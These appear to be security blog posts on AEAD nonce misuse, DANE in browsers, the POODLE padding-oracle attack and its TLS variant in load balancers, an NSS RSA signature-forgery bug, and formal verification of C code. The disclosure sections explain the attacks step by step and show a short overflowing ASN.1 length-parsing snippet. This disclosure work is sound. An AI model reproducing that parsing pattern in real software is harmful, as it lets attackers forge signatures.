Another approach would be to use an AEAD that doesn't fail quite so catastrophically when an nonce is repeated. This is called an nonce-misuse resistant AEAD and we're hitting the boundary of developed practice now. The CAESAR competition has several nonce-misuse resistant entries in it, although it's not scheduled to conclude until 2018. Closer to established primitives, Gueron and Lindell propose an AES-GCM-SIV mode with a strong foundation (assuming that you trust AES-GCM) and good performance (assuming that you have good AES-GCM performance).

AEADs with large plaintexts

If you look at AEAD APIs you'll generally notice that they take the entire plaintext or ciphertext at once. In other words, they aren't “streaming” APIs. This is not a mistake, rather it's the streaming APIs that are generally a mistake.

I've complained about this in the past, so I'll be brief here. In short, old standards (e.g. PGP) will encrypt plaintexts of any length and then put an authenticator at the end. The likely outcome of such a design is that some implementations will stream out unauthenticated plaintext and only notice any problem when they get to the end of the ciphertext and try to check the authenticator. But by that time the damage has been done—it doesn't take much searching to find people suggesting piping the output of gpg to tar or even a shell.

So, if streaming is required, large plaintexts should be chunked and each chunk should easily fit into a “one-shot” API like those linked to above. That prevents unauthenticated plaintext from being processed. However, there is no standard for this; it's another case where we've hit the borders of existing practice. Implementations need to construct the nonces and associated data so that the first chunk is known to be the first, so that each chunk is in order and so that truncation is always detectable.

Streaming decryption always runs the risk of an attacker truncating the ciphertext however. Designs must always be able to detect truncation, but it's very easy to imagine that the rest of a system doesn't handle it well. (For example, see the Cookie Cutter attack against HTTPS.)

If streaming isn't essential then an all-or-nothing transform would be ideal. But, again, there's no substantial standards or practice around this. Hopefully in ten years or so there will be clear answers for this and for large-plaintext constructions with AEADs (AERO is a start). But, for now, even symmetric encryption isn't a “solved problem”.

Why not DANE in browsers

Thomas Ptacek laid out a number of arguments against DNSSEC recently (and in a follow up). We don't fully agree on everything, but it did prompt me to write why, even if you assume DNSSEC, DANE (the standard for speaking about the intersection of TLS and DNSSEC) is not a foregone conclusion in web browsers.

There are two ways that you might wish to use DANE in a web browser: either to block a certificate that would normally be considered valid, or to bless a certificate that would normally be rejected. The first, obviously, requires that DANE information always be obtained—if a lookup failure was ignored, a network attacker with a bad certificate would just simulate a lookup failure. But requiring that browsers always obtain DANE information (or a proof of absence) is nearly implausible:

Some years ago now, Chrome did an experiment where we would lookup a TXT record that we knew existed when we knew the Internet connection was working. At the time, some 4–5% of users couldn't lookup that record; we assume because the network wasn't transparent to non-standard DNS resource types. DANE records are going to be even more non-standard, are going to be larger and browsers would have to fetch lots of them because they'll need the DNSKEY/RRSIG chain up from the root. Even if DNSSEC record lookup worked flawlessly for everyone, we probably still wouldn't implement this aspect of DANE because each extra lookup is more latency and another chance for packet loss to cause an expensive timeout and retransmit.

Instead, for this we have HPKP, which is a memory-based pinning solution using HTTP headers. We also have pre-loaded pinning in Chrome for larger or more obvious targets. Thomas Ptacek seems bullish on pinning but I'm much more lukewarm. HPKP is quite complex and no doubt someone will write a “supercookies” story about it at some point, as they have for HSTS. Additionally, pinning is quite dangerous. Clients deciding that “pinning is good” have caused headaches at Google. It's also worth noting that CryptoCat has committed pinning-suicide in Chrome at at the moment due to their CA having switched intermediates between renewals. They're waiting for the release of Chrome 41 to recover.

But what about the other side of DANE: blessing certificates that would otherwise be considered untrusted? In this case, DNSSEC can be seen as something like another CA. The same problems with looking up DNSSEC records apply, but are much less painful when you only need to depend on the lookup for sites that are using DANE certificates. Indeed, Chrome even supported something very like DANE for a while. In that case the DNSSEC records were contained in the certificate to avoid the latency and complexity of looking them up in the client. (DNSSEC records contains signatures so need not be transported over the DNS protocol.)

But support for that was removed because it was a bunch of parsing code outside of the sandbox, wasn't really being used and it conflicted with two long-term plans for the health of the HTTPS ecosystem: eliminating 1024-bit RSA and Certificate Transparency. The conflicts are probably the most important reasons for not wanting to renew the experiment.

The effort to remove 1024-bit RSA from HTTPS has been going for years and is, perhaps, nearing completion now. (That noise that you can hear is my colleague, Ryan Sleevi, crying softly.). There are still some 1024-bit root certificates, but they are nearly gone from the Mozilla set. The amount of work involved is an order of magnitude greater than you expect because of the interactions of different X.509 validation libraries, intermediate chains and varying root stores on different platforms and versions.

DNSSEC, however, is littered with 1024-bit RSA. You literally can't avoid it because the root zone transits through a 1024-bit key. DNSSEC has them because of (I think) concerns about the size of responses and they are usually rotated every two or three months. The RFC suggests that 1024-bit RSA is good for “most zones” until 2022. Dan Bernstein's paper on Batch NFS deals well with the question of whether that's wise.

Next, Certificate Transparency is our effort to add strong, technical audits to the CA system by creating a trustworthy log of all valid certificates. CT logs only accept certificates from CA as an anti-spam measure but people can create DANE certificates for domains at will. This is far from an insurmountable problem, but it is a problem that would need to be solved and the CT team already have their hands full with the staged rollout of CT in Chrome.

The 1024-bit RSA problem isn't insurmountable either (although it's baked in much deeper), so it's possible that browsers might accept a DNSSEC signature chain in a certificate in the future, but it's a long way out.

The POODLE bites again

October's POODLE attack affected CBC-mode cipher suites in SSLv3 due to SSLv3's under-specification of the contents of the CBC padding bytes. Since SSLv3 didn't say what the padding bytes should be, implementations couldn't check them and that opened SSLv3 up to an oracle attack.

We're done pretty well at killing off SSLv3 in response to that. Chrome 39 (released Nov 18th) removed fallback to SSLv3 and Chrome 40 is scheduled to remove SSLv3 completely. Firefox 34 (released Dec 1st) has already removed SSLv3 support.

We're removing SSLv3 in favour of TLS because TLS fully specifies the contents of the padding bytes and thus stops the attack. However, TLS's padding is a subset of SSLv3's padding so, technically, you could use an SSLv3 decoding function with TLS and it would still work fine. It wouldn't check the padding bytes but that wouldn't cause any problems in normal operation. However, if an SSLv3 decoding function was used with TLS, then the POODLE attack would work, even against TLS connections.

This was noted by, at least, Brian Smith on the TLS list ([1][2]) and I was sufficiently cynical to assume that there were probably more instances of this than the old versions of NSS that Brian cited, and so wrote a scanner for the issue.

Unfortunately, I found a number of major sites that had this problem. At least one of whom I had good enough contacts at to quickly find that they used an F5 device to terminate connections. I contacted F5 on October 21st and they started working on a fix. Yngve Pettersen also independently found this issue and contacted me about it around this time.

F5 reported that some of the affected sites weren't customers of theirs, which meant that there was (at least) a second vendor with the same issue. After more digging, I found that some A10 devices also have this problem. I emailed a number of contacts at A10 on October 30th but sadly didn't get a reply from any of them. It wasn't until November 13th that I found the right person at A10 to deal with this.

F5 and A10 have posted patches for their products (F5's are here and A10's are here and they have an advisory here). I'm not completely sure that I've found every affected vendor but, now that this issue is public, any other affected products should quickly come to light. (Citrix devices have an odd behaviour in this area in that they'll accept padding bytes that are all zeros, but not random padding. That's unexpected but I can't make an attack out of it.)

(Update: since posting this, it appears that products from Fortinet, Cisco, IBM (WebSphere, Domino, Tivoli) and Juniper may also be affected.)

Ivan Ristić has added a test for this issue to his excellent scanner at SSLLabs. Affected sites will have their grade set to F and will report “This server is vulnerable to the POODLE attack against TLS servers”.

This seems like a good moment to reiterate that everything less than TLS 1.2 with an AEAD cipher suite is cryptographically broken. An IETF draft to prohibit RC4 is in Last Call at the moment but it would be wrong to believe that RC4 is uniquely bad. While RC4 is fundamentally broken and no implementation can save it, attacks against MtE-CBC ciphers have repeatedly been shown to be far more practical. Thankfully, TLS 1.2 support is about to hit 50% at the time of writing.

POODLE attacks on SSLv3

My colleague, Bodo Möller, in collaboration with Thai Duong and Krzysztof Kotowicz (also Googlers), just posted details about a padding oracle attack against CBC-mode ciphers in SSLv3. This attack, called POODLE, is similar to the BEAST attack and also allows a network attacker to extract the plaintext of targeted parts of an SSL connection, usually cookie data. Unlike the BEAST attack, it doesn't require such extensive control of the format of the plaintext and thus is more practical.

Fundamentally, the design flaw in SSL/TLS that allows this is the same as with Lucky13 and Vaudenay's two attacks: SSL got encryption and authentication the wrong way around – it authenticates before encrypting.

Consider the following plaintext HTTP request, which I've broken into 8-byte blocks (as in 3DES), but the same idea works for 16-byte blocks (as in AES) just as well:

image/svg+xml

The last block contains seven bytes of padding (represented as •) and the final byte is the length of the padding. (And I've used a fictional, 8-byte MAC, but that doesn't matter.) Before transmission, those blocks would be encrypted with 3DES or AES in CBC mode to provide confidentiality.

Now consider how CBC decryption works at the receiver, thanks to this public domain diagram from Wikipedia:

image/svg+xml block cipherdecryption Key Plaintext Ciphertext Initialization Vector (IV) block cipherdecryption Key Plaintext Ciphertext block cipherdecryption Key Plaintext Ciphertext

An attacker can't see the plaintext contents like we can in the diagram, above. They only see the CBC-encrypted ciphertext blocks. But what happens if the attacker duplicates the block containing the cookie data and overwrites the last block with it? When the receiver decrypts the last block it XORs in the contents of the previous ciphertext (which the attacker knows) and checks the authenticity of the data. Critically, since SSLv3 doesn't specify the contents of the padding (•) bytes, the receiver cannot check them. Thus the record will be accepted if, and only if, the last byte ends up as a seven.

An attacker can run Javascript in any origin in a browser and cause the browser to make requests (with cookies) to any other origin. If the attacker does this block duplication trick they have a 1-in-256 chance that the receiver won't reject the record and close the connection. If the receiver accepts the record then the attacker knows that the decryption of the cookie block that they duplicated, XORed with the ciphertext of the previous block, equals seven. Thus they've found the last byte of the cookie using (on average) 256 requests.

Now the attacker can increase the length of the requested URL and decrease the length of something after the cookies and make the request look like this:

image/svg+xml

Note that the Cookie data has been shifted so that the second to last byte of the data is now at the end of the block. So, with another 256 requests the attacker can expect to have decrypted that byte and so on.

Thus, with an average of 256×n requests and a little control of the layout of those requests, an attacker can decrypt n bytes of plaintext from SSLv3. The critical part of this attack is that SSLv3 doesn't specify the contents of padding bytes (the •s). TLS does and so this attack doesn't work because the attacker only has a 2-64 or 2-128 chance of a duplicated block being a valid padding block.

This should be an academic curiosity because SSLv3 was deprecated very nearly 15 years ago. However, the Internet is vast and full of bugs. The vastness means that a non-trivial number of SSLv3 servers still exist and workarounds for the bugs mean that an attacker can convince a browser to use SSLv3 even when both the browser and server support a more recent version. Thus, this attack is widely applicable.

SSL/TLS has a perfectly good version negotiation mechanism that should prevent a browser and server that support a modern TLS version from using anything less. However, because some servers are buggy and don't implement version negotiation correctly, browsers break this mechanism by retrying connections with lesser SSL/TLS versions when TLS handshaking fails. These days we're more aware of the fact that fallback behaviour like this is a landmine for the future (as demonstrated today) but this TLS fallback behaviour was enshrined long ago and we're stuck with it. It means that, by injecting some trivial errors on the network, an attacker can cause a browser to speak SSLv3 to any server and then run the above attack.

What's to be done?

It's no revelation that this fallback behaviour is bad news. In fact, Bodo and I have a draft out for a mechanism to add a second, less bug-rusted mechanism to prevent it called TLS_FALLBACK_SCSV. Chrome and Google have implemented it since February this year and so connections from Chrome to Google are already protected. We are urging server operators and other browsers to implement it too. It doesn't just protect against this specific attack, it solves the fallback problem in general. For example, it stops attackers from downgrading TLS 1.2 to 1.1 and 1.0 and thus removing modern, AEAD ciphers from a connection. (Remember, everything less than TLS 1.2 with an AEAD mode is cryptographically broken.) There should soon be an updated OpenSSL version that supports it.

Even with TLS_FALLBACK_SCSV, there will be a long tail of servers that don't update. Because of that, I've just landed a patch on Chrome trunk that disables fallback to SSLv3 for all servers. This change will break things and so we don't feel that we can jump it straight to Chrome's stable channel. But we do hope to get it there within weeks and so buggy servers that currently function only because of SSLv3 fallback will need to be updated.

Chrome users that just want to get rid of SSLv3 can use the command line flag --ssl-version-min=tls1 to do so. (We used to have an entry in the preferences for that but people thought that “SSL 3.0” was a higher version than “TLS 1.0” and would mistakenly disable the latter.)

In Firefox you can go into about:config and set security.tls.version.min to 1. I expect that other browser vendors will publish similar instructions over the coming days.

As a server operator, it is possible to stop this attack by disabling SSLv3, or by disabling CBC-mode ciphers in SSLv3. However, the compatibility impact of this is unclear. Certainly, disabling SSLv3 completely is likely to break IE6. Some sites will be happy doing that, some will not.

A little further down the line, perhaps in about three months, we hope to disable SSLv3 completely. The changes that I've just landed in Chrome only disable fallback to SSLv3 – a server that correctly negotiates SSLv3 can still use it. Disabling SSLv3 completely will break even more than just disabling the fallback but SSLv3 is now completely broken with CBC-mode ciphers and the only other option is RC4, which is hardly that attractive. Any servers depending on SSLv3 are thus on notice that they need to address that now.

We hardened SSLv3 and TLS 1.0 against the BEAST attack with 1/n-1 record splitting and, based on an idea by Håvard Molland, it is possible to do something called anti-POODLE record splitting this time. I'll omit the details, but one can ensure that the last block in a CBC record contains at least fixed six bytes using only one split for AES and two for 3DES. With this, CBC is probably less bad than RC4. However, while anti-POODLE record splitting should be easy to deploy because it's valid according to the spec, so was 1/n-1 and deploying that was very painful. Thus there's a high risk that this would also cause compatibility problems. Therefore I'm not proceeding with anti-POODLE record splitting and concentrating on removing SSLv3 fallback instead. (There's also the possibility that an attacker could run the attack on the server to client direction. If we assume that both the client and the server get patched then we might as well assume that they are patched for TLS_FALLBACK_SCSV, which makes record splitting moot.)

PKCS#1 signature validation

On Wednesday, Chrome and Mozilla did coordinated updates to fix an RSA signature verification bug in NSS — the crypto library that handles SSL in Firefox and (currently) Chrome on most platforms. The updates should be well spread now and the bug has been detailed on Reddit, so I think it's safe to talk about.

(Hilariously, on the same day, bash turned out to have a little security issue and so hardly anyone noticed the NSS one!)

The NSS bug is another variant of Bleichenbacher's 2006 attack on RSA signature validation. To recap: an RSA signature is roughly the cube root of the message hash modulo the RSA modulus. Verification involves cubing the signature and checking that the result is the hash that you expected. Cubing modulo an RSA modulus is easy but finding a cube root is infeasible.

There's a little more to it because one needs to eliminate some properties of the RSA operation by formatting the hash that you're going to sign — called padding.

The standard for RSA signing and encryption is PKCS#1 version 1.5. The PKCS series of standards are amazing. Although I've no doubt that the people writing them were doing their best, it was a long time ago and mistakes were made. In a modern light, they are all completely terrible. If you wanted something that was plausible enough to be widely implemented but complex enough to ensure that cryptography would forever be hamstrung by implementation bugs, you would be hard pressed to do better. If you can find some implementers, just say "PKCS#11!" or "PKCS#12!" as punchlines. You'll get a good laugh, although possibly also a few panic attacks.

(PKCS#1 version 2 is much better, but only because they took it from Bellare and Rogaway and slapped the PKCS#1 title on it.)

PKCS#1 version 1.5 wanted to include an identifier for the hash function that's being used, inside the signature. This is a fine idea, but they did it by encoding the algorithm and hash value with ASN.1. This caused many implementations to include the complexity of an ASN.1 parser inside signature validation and that let the bugs in.

Bleichenbacher's original attack was based on the observation that the ASN.1 parsers, in many cases, didn't reject extra trailing data. This is reasonable behaviour for a generic ASN.1 parser, but a disaster in signature verification. Because the parser could ignore so much of the signature, Bleichenbacher could arrange for a perfect cube to have a suitable prefix and thus calculate the cube root over the integers — ignoring the RSA modulus completely!

That was fixed, but there was another common bug: the ASN.1 structure used to identify the hash was a standard structure called AlgorithmIdentifier, which includes an optional parameter. Implementations were ignoring the parameter and that also introduced a vulnerability: arbitrary bytes could be inserted as a parameter and that was sufficient to forge signatures. (See section five of this paper for details.)

This week's vulnerability was similar. Antoine Delignat-Lavaud (who, by the way, has been doing stellar work along with the Prosecco team at INRIA: see Triple Handshake, Cookie Cutter, SPDY and virtual host attacks and miTLS) noticed that the check on the contents of the parameters in NSS wasn't very strict — it was only checking that the length was at most two bytes. This is because, due to complexity, there wasn't universal agreement on what the the parameter should be. The ASN.1 for the parameter is an ANY type (with the concrete type depending on a preceding object id) but also optional. So, when not needed, should it be an ASN.1 NULL (which is two bytes long), or should it be omitted completely? The answer is the former, but it was underspecified for a long time.

Once Antoine had put a spotlight on the code, Brian Smith noticed something worse: an integer overflow in the ASN.1 parser. ASN.1 (in DER form at least, because, of course, ASN.1 has multiple defined encodings) has variable-length lengths, and NSS was using a generic ASN.1 parser which didn't check for overflow. So you could specify that a length was arbitrarily long and the parser would do something similar to:

unsigned length = 0;
for (i = 0; i < length_of_length; i++) {
  length <<= 8;
  length |= length[i];
}

Thus, as long as the last 4 or 8 bytes (depending on whether the system was 32 or 64 bit) encoded the correct length, the bytes before that would be ignored. That allows arbitrary bytes in the signature again and the attack from section 5 of the previous paper can be still be used to make forged signatures.

(Intel's ATR group also reported the same issue to Mozilla a little bit later. Bugs often seem to work like scientific discovery.)

The moral of the story

The moral here is that an ASN.1 parser should never have been put somewhere so sensitive; parsing is dangerous. It was a mistake to have defined PKCS#1 that way, but it can be ameliorated: rather than parsing, generate the expected signature contents and compare it against the plaintext. Go has always done this. I believe that SSH does this. Bouncy Castle reportedly does this. BoringSSL does this because I changed it from OpenSSL (prior to learning about the NSS issue — it's just a good idea). NSS does it now, although they're still worried about the omitted parameter vs NULL parameter confusion so they serialise two ASN.1 outputs and compare against both.

I generated a number of tests of different possible points of flexibility in signature parsing so that other libraries can be tested. For example, you can test OpenSSL (which still uses an ASN.1 parser) against them like this:

for cert in $(ls *.crt | grep -v root2048.crt); do
  openssl verify -CAfile root2048.crt $cert 2>> /dev/null | grep -q "$cert: OK"
  if [ $? -eq 0 ] ; then
    echo "$cert accepted"
  fi
done

The file control.crt should always be accepted. The file missingnull.crt will be accepted if you allow the parameter to be omitted. (I recommend against that. BoringSSL doesn't allow it and we'll see whether we can make that stick.) Nothing else should be accepted.

Sadly, OpenSSL 1.0.1 also accepts highvaltag.crt (ordinary ASN.1 tags in high-value form) and indeflen.crt (BER indefinite lengths rather than DER). The OpenSSL development branch also accepts bernull.crt (superfluous zero bytes in a length). To be clear, there is no known vulnerability here, but it's unwelcome flexibility in something that should be rigid. (I let OpenSSL team know on Wednesday and that they're welcome to use the code from BoringSSL.)

Remember, we use PKCS in browsers because we have to deal with the world as we find it, not as we want it. If you are not so encumbered, consider something simpler.

A couple more formal systems

After my last post on formal analysis of C code, people pointed out several other options to me and I wanted to do a follow up because the conclusion is a little more positive now.

Firstly, I noted last time that Z3 was the best, Why3-compatible SMT solver for my problem but that it came with a non-commercial license. Craig Stuntz pointed out that Microsoft sell a commercial license for $10K. Sure, that's quite a lot for a hobbyist project, but it's easy for a corporation and a lot easier than having to negotiate specially.

The first additional thing that I've looked into is AutoCorres. I mentioned last time that SeL4's refinement proof to C code involved a C parser in Isabelle that output structures in the Simpl framework and that Simpl was pretty intimidating.

AutoCorres is a tool for verifiably simplifing the Simpl structures and thus making proofs easier. Let's repeat the example from last time and show how AutoCorres helps. Here's the test C function:

int add(int a, int b) {
  return a+b;
}

And here's the raw result from the C parser, exactly as I showed last time:

test_global_addresses.add_body ≡
TRY
  Guard SignedArithmetic ⦃-2147483648 ≤ sint ´a + sint ´b ∧ sint ´a + sint ´b ≤ 2147483647⦄
   (creturn global_exn_var_'_update ret__int_'_update (λs. a_' s + b_' s));;
  Guard DontReach {} SKIP
CATCH SKIP
END

And here's what AutoCorres makes of it:

add' ?a ?b ≡
  DO oguard (λs. INT_MIN ≤ ?a + ?b);
     oguard (λs. ?a + ?b ≤ INT_MAX);
     oreturn (?a + ?b)
  OD

That's very impressive! That's using a Maybe monad (using the Haskell name) in Isabelle to handle the possible overflow. Obviously that's a lot easier to deal with than the raw Simpl. Here's the field addition function that I was using for the other examples in the previous post:

void add(int *out, const int *x, const int *y) {
  unsigned int i;
  unsigned int size = 10;
  for (i = 0; i < size; i++) {
    out[i] = x[i] + y[i];
  }
}

And here it is after AutoCorres:

add' ?out ?x ?y ≡
do i ← whileLoop (λi s. i < 0xA)
          (λi. do guard (λs. is_valid_w32 s (ptr_coerce (?out +⇩p uint i)));
                  guard (λs. is_valid_w32 s (ptr_coerce (?x +⇩p uint i)));
                  guard (λs. is_valid_w32 s (ptr_coerce (?y +⇩p uint i)));
                  guard (λs. INT_MIN ≤ sint (ucast s[ptr_coerce (?x +⇩p uint i)]) + sint (ucast s[ptr_coerce (?y +⇩p uint i)]));
                  guard (λs. sint (ucast s[ptr_coerce (?x +⇩p uint i)]) + sint (ucast s[ptr_coerce (?y +⇩p uint i)]) ≤ INT_MAX);
                  modify (λs. s[ptr_coerce (?out +⇩p uint i) := s[ptr_coerce (?x +⇩p uint i)] + s[ptr_coerce (?y +⇩p uint i)]]);
                  return (i + 1)
               od)
         0;
   skip
od

While the AutoCorres output looks very clean, there isn't any documentation at the moment which means that it's a little hard to actually use. (There are a couple of papers on the home page that are well worth reading - but I didn't find anything like a user guide.) There are some examples from which it's possible to make some guesses, but I wasn't able to get very far in a proof. Also, since AutoCorres builds on Simpl and C parser, it has the same limitations - most notably that the address of local variables can't be taken.

None the less, AutoCorres holds a lot of promise.

Next, is VST from Andrew Appel and others (yes, that Appel). VST is a framework for proving the behaviour of C code with Coq by using one of the intermediate languages from CompCert. Coq (which I'm pronouncing as “coke”) is a proof system like Isabelle and CompCert is a formally verified compiler. That means that it's possible to have a chain of formal verification from C code all the way to the semantics of the machine language! Additionally, the C parser isn't correctness critical because VST proves properties using the same parse tree as the verified compiler. That's an extremely strong verification standard.

CompCert is a mixture of GPL and “non-commercial” licensed code. It appears that everything needed for VST is licensed as GPL or another free license. So, one can also use VST to verify C code and then use a different compiler to build it if the non-commercial restriction is a problem. That moves the CompCert C parser and the other compiler into the trusted set, but so it goes.

The VST logic also appears to be very capable. It doesn't have a problem with pointers to local variables and should even have the capability to support reasoning about concurrent programs. The restrictions that it does have are local changes: only one memory load per line (at the moment) or side effect per statement and void functions need an explicit return at the end. (Unfortunately, one doesn't get an error from violating these requirements - rather the proof cannot be completed.)

VST thankfully, has brief documentation online which is expanded upon in the form of a book ($15 as a DRMed download). The book contains a very abstract articulation of the underlying logic which, to be honest, defeated me initially. I'd recommend skipping chapters 2 through 21 on a first reading and coming back to them later. They are useful, but they're also a lot clearer after having played with the software for a while.

Here's the same example function, translated into VST style. I switched back from having a special output array because that was something that I changed to make the SPARK verification easier but it was never part of the original code and VST doesn't have problem with overlapping the input and output. I've also switched from a for loop to a while loop because the documentation and examples for the latter are better. Otherwise, the changes are just to limit each statement to a single memory access and to include the final return.

void add(int *a, int *b) {
	int t1, t2;
	int i = 0;
	while (i < 10) {
		t1 = a[i];
		t2 = b[i];
		a[i] = t1 + t2;
		i++;
	}
	return;
}

We can use clightgen from CompCert to parse that into the intermediate language that CompCert and VST use. (A word to the wise - if you want to install VST, use exactly Coq 8.4p2, not the latest version which is 8.4p4.) Then we can use Coq to prove its behaviour.

Compared to Isabelle, Coq's proofs aren't as clear as the Isar style proofs in Isabelle (although the terseness is more useful when proofs are this complex) and neither Proof General nor CoqIDE are as nice as Isabelle's jedit mode. But it's not otherwise dramatically different.

Here's a specification of add in VST/Coq's language:

Definition bound_int (v : val) (b : Z) :=
  match v with
  | Vint i => -b < (Int.signed i) < b
  | _ => False
  end.

Definition partial_add (i: Z) (l: Z -> val) (r: Z -> val) (j: Z) :=
  if zlt j i then Val.add (l j) (r j) else (l j).

Definition add_spec :=
  DECLARE _add
  WITH a0 : val, b0 : val, sh : share, orig_a : Z -> val, orig_b : Z -> val
  PRE [_a OF (tptr tint), _b OF (tptr tint)]
    PROP (writable_share sh;
          forall i, 0 <= i < 10 -> is_int (orig_a i);
          forall i, 0 <= i < 10 -> is_int (orig_b i);
          forall i, 0 <= i < 10 -> bound_int (orig_a i) 134217728;
          forall i, 0 <= i < 10 -> bound_int (orig_b i) 134217728)
    LOCAL (`(eq a0) (eval_id _a);
           `(eq b0) (eval_id _b);
           `isptr (eval_id _a);
           `isptr (eval_id _b))
    SEP (`(array_at tint sh orig_a 0 10 a0);
         `(array_at tint sh orig_b 0 10 b0))
  POST [ tvoid ]
    PROP ()
    LOCAL ()
    SEP (`(array_at tint sh (partial_add 10 orig_a orig_b) 0 10 a0);
         `(array_at tint sh orig_b 0 10 b0)).

The partial_add function implements a map that reflects the state of the a array at step i of the loop. I've written it like that so that it can also be used in the loop invariant.

And here's the proof: It is quite long, but at least half of that is because I've not used Coq before and I don't know what I'm doing. I wouldn't call it readable however.

Definition inv orig_a a0 orig_b b0 sh :=
  EX i:Z,
    (PROP (0 <= i < 11;
           isptr a0;
           isptr b0)
     LOCAL (`(eq a0) (eval_id _a);
            `(eq b0) (eval_id _b);
            `(eq (Vint (Int.repr i))) (eval_id _i))
   SEP (`(array_at tint sh (partial_add i orig_a orig_b) 0 10 a0);
        `(array_at tint sh orig_b 0 10 b0))).

Lemma mod_nop : forall (i : Z) (m : Z), 0 <= i < m -> m > 0 -> i mod m = i.
Proof.
intros.
rewrite Zdiv.Zmod_eq.
assert(i/m=0).
apply Zdiv_small.
exact H.
rewrite H1.
omega.
exact H0.
Qed.

Lemma body_sumarray: semax_body Vprog Gprog f_add add_spec.
Proof.
start_function.
forward.
forward_while
  (inv orig_a a0 orig_b b0 sh)
  (
     PROP ()
     LOCAL ()
     SEP (`(array_at tint sh (partial_add 10 orig_a orig_b) 0 10 a0);
          `(array_at tint sh orig_b 0 10 b0))).
apply exp_right with 0.
entailer!.
quick_typecheck.
entailer.
cancel.
assert(i=10).
omega.
rewrite H7.
cancel.
forward.
entailer!.
unfold partial_add.
assert(is_int (orig_a i)).
auto.
assert(is_int (orig_b i)).
auto.
if_tac.
omega.
exact H7.
forward.
entailer!.
forward.
entailer.
apply prop_right.
assert(Vint (Int.add _id1 _id) = partial_add (i+1) orig_a orig_b (Int.signed (Int.repr i))).
Focus 2.
symmetry in H9.
apply H9.
unfold partial_add.
assert(Int.signed (Int.repr i) = i).
rewrite Int.signed_repr.
reflexivity.
unfold Int.max_signed, Int.min_signed.
simpl.
omega.
rewrite H9.
if_tac.
unfold Val.add.
rewrite Int.signed_repr_eq in H7.
rewrite mod_nop in H7.
if_tac in H7.
unfold partial_add in H7.
if_tac in H7.
omega.
rewrite Int.signed_repr_eq in H6.
rewrite mod_nop in H6.
if_tac in H6.
unfold Int.add, Int.unsigned, Int.intval, Int.repr.
assert(bound_int (orig_a i) 134217728).
auto.
unfold bound_int in H12.
symmetry in H7, H6.
rewrite H7.
rewrite H6.
reflexivity.
omega.
assert(Int.modulus = 4294967296).
auto.
rewrite H13.
omega.
assert(Int.modulus = 4294967296).
auto.
omega.
assert(i < Int.half_modulus).
assert(Int.half_modulus = 2147483648).
auto.
rewrite H12.
rewrite H12 in H11.
omega.
omega.
assert(Int.modulus = 4294967296).
auto.
omega.
assert(Int.modulus = 4294967296).
auto.
rewrite H11.
omega.
omega.
forward.
unfold inv.
apply exp_right with (Zsucc i).
entailer!.
apply derives_refl'.
apply equal_f.
apply array_at_ext.
intros.
unfold upd.
if_tac.
rewrite H10.
unfold Z.succ.
reflexivity.
unfold partial_add.
if_tac.
if_tac.
reflexivity.
omega.
if_tac.
omega.
reflexivity.
forward.
Qed.

That's certainly quite a chunk! Practically you have to step through the proof in Proof General and see the state evolve to understand anything. Additionally, when in the proof, it would be very useful if subgoals has some sort of description like “show the loop invariant plus not the loop condition results in the loop post-condition” - it's very easy to get lost in the proof. But I do feel that, while it would be a lot of work, I could make progress with VST, while I don't (at the moment) feel with other systems. Prof. Appel recently did a formal verification of the SHA256 from OpenSSL.

However, there is no community around VST that I can find - no mailing list, wiki, etc. The Subversion repo is only accessible via HTTP - you can't clone it from what I can tell. I think I found a (completeness) bug in VST, but the only option would be to try emailing Prof. Appel. (I didn't; I'm probably wrong.)

Still, AutoCorres and especially VST leave me more optimistic than I was at the end of the last post!

Others

I didn't have time to look at everything that deserved attention. Cryptol is one. Cryptol is a tool written in Haskell designed for the specification and implementation of cryptographic code and can call out to SMT solvers to show certain properties. From its internal language it can export implementations to (at least) C.

Next, Frama-C, which I mentioned last time in relation to the Jessie plugin, has other plugins. One that's useful is the value analysis, which can be properly used to eliminate NULL derefs, array overruns etc. In fact, Polar SSL has been fully validated in certain configurations using that. That's certainly very valuable, and you can do it without that multi-page Coq proof! Although such analysis wouldn't have caught the carry bug in Ed25519 nor the reduction bug in Donna, not all code is going to be suitable for formal analysis.

Microsoft also have lots of things. There's Dafny, VCC (Verifier for Concurrent C), Boogie, Havoc, Z3 and others! I didn't look at them because I don't have a Windows box to hand this week (although I see that some are exposed via a web interface too). I was thinking that maybe I'd have time when a Windows box was to hand but, realistically, probably not. So I've updated this post to mention them here. If you are Windows based, you will probably do well to pay attention to them first.

A shallow survey of formal methods for C code

Two interesting things in formally verified software happened recently. The big one was the release of SeL4 - a formally verified L4 microkernel. The second was much smaller, but closer to my usual scope: a paper which showed the correctness of sections of a couple of the assembly implementations of Curve25519.

Overflow and carry bugs are subtle and, although with 32-bit words you might hope to be able to do enough random testing to eliminate them, that's much less plausible with 64-bit implementations. The TweetNaCl paper mentions a bug that lived in one of the assembly implementations of ed25519 for years and I've sinned too:

When I wrote curve25519-donna (back when it was the only 64-bit implementation of Curve25519), I first wrote a 32-bit version which mirrored the implementation of the athlon assembly version. This was just to provide a reference for the 64-bit code, but it was included in the repository for education. It was never really supposed to be used, and wasn't constant-time, but I was aware that it was being used by some groups.

Many years later, someone noticed that it was missing a reduction in the final contraction. Values between 2255-19 and 2255 would be output when they should have been reduced. This turned out to be harmless (as best I can tell), but embarrassing none the less.

And Curve25519 is a very nice curve to implement! Take a look at the overflow considerations for this version of P-256. I hope that I got everything right there, but it's very complex. More formal verification of the software would be welcome!

SeL4 has a multi-stage verification using refinement. Refinement is the process of showing that two pieces of code behave identically where one version is more abstract. SeL4's proof refines from an abstract specification to a Haskell implementation to the C implementation. It also has a SAT-solver based proof that the ARMv6 assembly matches the C implementation.

The refinement proofs are done in Isabelle/HOL which, along with Coq, are the major proof systems. (There are several other systems including HOL Light, HOL4 and Mizar.) Proof systems assist in the construction of automated proofs using simple rules of inference and axioms. Although not used for software verification, Metamath is a good introduction to the idea. It clearly explains its axioms (which Isabelle and Coq are very bad at) and gives an idea for the scale of formal proofs with an example of 2+2 = 4.

The best introduction to Isabelle that I know of is the book Concrete Semantics, although I do wish that it would start with Isar style proofs much sooner. If you're doing work in Isabelle I think you need page 57 printed and stuck to the wall and if you're going through that book and exercises I'd recommend peeking at the Isar chapter sooner.

But Isabelle's traditional workflow is to write in its functional language and export to OCaml or Haskell. That's no help if we're seeking to prove things about C code.

Isabelle's theorems are objects in its underlying ML language and so you can write a program in ML that parses C and use the result in Isabelle. That's what SeL4 does. The underlying framework for expressing imperative languages in Isabelle is Schirmer's Simpl and this imposes some odd limitations on the C that can be processed. For one, all the local variables with the same name in a given .c file have to have the same type because the local state of all functions in a .c file is represented in a single struct. For the same reason, it's not possible to take the address of a local variable.

But we can try parsing a very simple C file with SeL4's parser:

